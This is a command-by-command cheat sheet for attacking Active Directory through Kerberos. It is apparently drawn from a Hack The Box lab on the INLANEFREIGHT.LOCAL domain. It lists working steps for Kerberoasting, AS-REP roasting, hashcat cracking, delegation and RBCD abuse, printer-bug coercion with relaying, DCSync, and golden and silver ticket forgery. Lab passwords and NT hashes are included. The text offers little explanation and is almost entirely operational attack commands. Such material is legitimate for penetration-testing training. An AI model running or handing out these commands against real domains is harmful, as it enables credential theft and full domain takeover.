# Request 1 Ticket
GetUsersSPNs.py -dc-ip <ip> <domain/<user> -request-user <username>

# Request All Tickets
GetUsersSPNs.py -dc-ip <ip> <domain/<user --request

# Save to Output
GetUserSPNs.py -dc-ip <ip> INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs

# Crack TGS Ticket
hashcat -m 13100 file.tgs $ROCKYOU

# Find Accounts with SPN
setspn.exe -Q */*

# Better Command
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

# Enable Base64 Output
base64 /out:true

# Export Tickets
kerberos::list /export  

# Modify To Better Format
echo "<base64 blob>" |  tr -d \\n 

# Output To John Format
cat encoded_file | base64 -d > sqldev.kirbi

# Make to John Format
python2.7 kirbi2john.py sqldev.kirbi

# HashCat Way, Modify to hashcat format
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' 

# Import Module
Import-Module .\PowerView.ps1

# List Users With SPN
Get-DomainUser * -spn | select samaccountname

# Target Single User + Hashcat Output
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

# /Stats
.\Rubeus.exe kerberoast /stats

# List Admin Privileges Users for Kerberoasting
 .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

# Set password
$SecPassword = ConvertTo-SecureString '0xF0rk123!' -AsPlainText -Force

# Set Proper Login
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)

# Use Command with Credentials
get-domainuser -spn -credential $Cred | select samaccountname

# Check HTTP Ticket Present
klist

# Configure PSSession
Register-PSSessionConfiguration -Name backupadmsess -RunAsCredential inlanefreight\backupadm

# Connect 
Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -ConfigurationName  backupadmsess

# PowerView: Discover Account with Pre-Authentication Disbaled
Get-DomainUser -UACFilter DONT_REQ_PREAUTH | select samaccountname,useraccountcontrol

# Rubeus: Enumerate all user Accounts for Pre-Authentication
Rubeus.exe asreproast /format:hashcat

# Rubeus
 .\Rubeus.exe asreproast /user:jenna.smith /domain:inlanefreight.local /dc:dc01.inlanefreight.local /nowrap /outfile:hashes.txt

# Crack the Hash
hashcat.exe -m 18200 hashes $ROCKYOU

Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose

GetNPUsers.py inlanefreight.local/pixis -request  

GetNPUsers.py INLANEFREIGHT/ -dc-ip 10.129.205.35 -usersfile /tmp/users.txt -format hashcat -no-pass

$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$results = $search.Findall()
foreach($result in $results)
{
    $userEntry = $result.GetDirectoryEntry()
    Write-host "User" 
    Write-Host "===="
    Write-Host $userEntry.name "(" $userEntry.distinguishedName ")"
        Write-host ""
    Write-host "SPNs"
    Write-Host "===="     
    foreach($SPN in $userEntry.servicePrincipalName)
    {
        $SPN       
    }
    Write-host ""
    Write-host ""
}

# Run Script
.\FindSPNAccounts.ps1

# Find Accounts
Get-DomanUser -SPN | select samaccountname, serviceprincipalname,memberof

Invoke-Kerberoast

Rubeus.exe kerberoast /nowrap

Rubeus.exe kerberoast /nopreauth:amber.smith /domain:inlanefreight.local /spn:MSSQLSvc/SQL01:1433 /nowrap

GetUserSPNs.py inlanefreight.local/pixis -request

.\Rubeus.exe monitor /interval:5 /nowrap

.\Rubeus.exe asktgs /ticket:<base64> /service:cifs/dc01.INLANEFREIGHT.local /ptt

dir \\dc01.inlanefreight.local\c$

.\Rubeus.exe monitor /interval:5 /nowrap

 .\SpoolSample.exe dc01.inlanefreight.local sql01.inlanefreight.local

# Once Intercepted, we need to renew the ticket
.\Rubeus.exe renew /ticket:<base64> /ptt

# Since we haveTicket from dc01 and can dump all the hashes
lsadump::dcsync

# With DCSync, we are able to get all the hashes, we use the administrator hash to askTGT
.\Rubeus.exe asktgt /rc4:<NT-Hash> /user:<user> /ptt

# Perform Actions on DC01
dir \\dc01.inlanefreight.local\c$

Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" | select samaccountname, useraccountcontrol

# Host DNS Server
python dnstool.py -u INLANEFREIGHT.LOCAL\\pixis -p p4ssw0rd -r roguecomputer.INLANEFREIGHT.LOCAL -d 10.10.14.2 --action add 10.129.1.207

nslookup roguecomputer.inlanefreight.local dc01.inlanefreight.local

python addspn.py -u inlanefreight.local\\pixis -p p4ssw0rd --target-type samname -t sqldev -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local

sudo python krbrelayx.py -hashes :cf3a5525ee9414229e66279623ed5c58

python3 printerbug.py inlanefreight.local/carole.rose:jasmine@10.129.205.35 fakepcs.inlanefreight.local

sudo python krbrelayx.py -hashes :cf3a5525ee9414229e66279623ed5c58

export KRB5CCNAME=<ccache>

secretsdump.py -k -no-pass dc01.inlanefreight.local

Get-DomainCoputer -TrustedAuth | select serviceprincipalname,dnshostname,useraccountcontrol

.\mimikatz.exe privilege::debug sekurlsa::msv exit

# Need Machine Hash as rc4
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:www/WS01.inlanefreight.local /altservice:HTTP /user:DMZ01$ /rc4:ff955e93a130f5bb1a6565f32b7dc127 /ptt

# Verify Ticket
klist

# Enter Session
Enter-PSSession ws01.inlanefreight.local

findDelegation.py INLANEFREIGHT.LOCAL/carole.rose:jasmine

getST.py -spn SERVER01 'INLANEFREIGHT.LOCAL/daniel.whitehead:dolphin' -impersonate Administrator

# Export ccache
export KRB5CCNAME=<ccache>

# Login
psexec.py -k -no-pass INLANEFREIGHT.LOCAL/administrator@DC01 -debug

# import the PowerView module
Import-Module C:\Tools\PowerView.ps1

# get all computers in the domain
$computers = Get-DomainComputer

# get all users in the domain
$users = Get-DomainUser

# define the required access rights
$accessRights = "GenericWrite","GenericAll","WriteProperty","WriteDacl"

# loop through each computer in the domain
foreach ($computer in $computers) {
    # get the security descriptor for the computer
    $acl = Get-ObjectAcl -SamAccountName $computer.SamAccountName -ResolveGUIDs

    # loop through each user in the domain
    foreach ($user in $users) {
        # check if the user has the required access rights on the computer object
        $hasAccess = $acl | ?{$_.SecurityIdentifier -eq $user.ObjectSID} | %{($_.ActiveDirectoryRights -match ($accessRights -join '|'))}

        if ($hasAccess) {
            Write-Output "$($user.SamAccountName) has the required access rights on $($computer.Name)"
        }
    }
}

# Import PowerMad
Import-Module .\Powermad.ps1

# Add New Computer
New-MachineAccount -MachineAccount HACKTHEBOX -Password $(ConvertTo-SecureString "Hackthebox123+!" -AsPlainText -Force)

# Import PowerView
Import-Module .\PowerView.ps1

# Step 1
$ComputerSid = Get-DomainComputer HACKTHEBOX -Properties objectsid | Select -Expand objectsid

# Step 2
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"

$SDBytes = New-Object byte[] ($SD.BinaryLength)

$SD.GetBinaryForm($SDBytes, 0)

# Step 3
$credentials = New-Object System.Management.Automation.PSCredential "INLANEFREIGHT\carole.holmes", (ConvertTo-SecureString "Y3t4n0th3rP4ssw0rd" -AsPlainText -Force)

# Step 4
Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Credential $credentials -Verbose

.\Rubeus.exe hash /password:Hackthebox123+! /user:HACKTHEBOX$ /domain:inlanefreight.local

# /altservice:host,RPCSS,wsman,http,ldap,krbtgt,winrm
.\Rubeus.exe s4u /user:HACKTHEBOX$ /rc4:CF767C9A9C529361F108AA67BF1B3695 /impersonateuser:administrator /msdsspn:cifs/dc01.inlanefreight.local /ptt

# Connect to DC
ls \\dc01.inlanefreight.local\c$

addcomputer.py -computer-name 'HACKTHEBOX$' -computer-pass Hackthebox123+\! -dc-ip 10.129.96.44 inlanefreight.local/carole.holmes:'Y3t4n0th3rP4ssw0rd'

 python3 rbcd.py -dc-ip 172.16.8.35 -t DC01 -f HACKTHEBOX 'inlanefreight.local/annette.jackson:horses'

getST.py -spn cifs/DC01.inlanefreight.local -impersonate Administrator -dc-ip 10.129.96.44 inlanefreight.local/HACKTHEBOX:Hackthebox123+\!

# Export ccache
export KRB5CCNAME=<ccache>

# psexec
psexec.py -k -no-pass dc01.inlanefreight.local

Get-Domain

Get-DomainSID

.\mimikatz.exe privilege::debug "lsadump::dcsync /user:krbtgt /domain:inlanefreight.local" exit

.\mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:c0231bd8a4a4de92fca0760c0ba9e7a6 /ptt" "exit"

Enter-PSSession dc01

lookupsid.py inlanefreight.local/pixis@dc01.inlanefreight.local -domain-sids

ticketer.py -nthash c0231bd8a4a4de92fca0760c0ba9e7a6 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local Administrator

export KRB5CCNAME=<ccache>

# Login
psexec.py -k -no-pass dc01.inlanefreight.local

Get-DomainSid

Without this account, a silver ticket is not possible

.\mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:027c6604526b7b16a22e320b76e54a5b /target:sql01.inlanefreight.local /service:cifs  /ptt" "exit"

# Create Process
Rubeus.exe createnetonly /program:cmd.exe /show

# Import Silver Ticket
Rubeus.exe ptt /ticket:sql01.kirbi

# Login
PSExec.exe -accepteula \\sql01.inlanefreight.local cmd

lookupsid.py inlanefreight.local/pixis@dc01.inlanefreight.local -domain-sids

ticketer.py -nthash 542780725df68d3456a0672f59001987 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local -spn cifs/sql01.inlanefreight.local Administrator

export KRB5CCNAME=<ccache>

# Login
smbclient.py -k -no-pass sql01.inlanefreight.local

.\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

.\rubeus.exe triage

#  krbtgt/INLANEFREIGHT.LOCAL
.\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap

Rubeus.exe renew /ticket:<base64> /ptt

dir \\dc01\\c$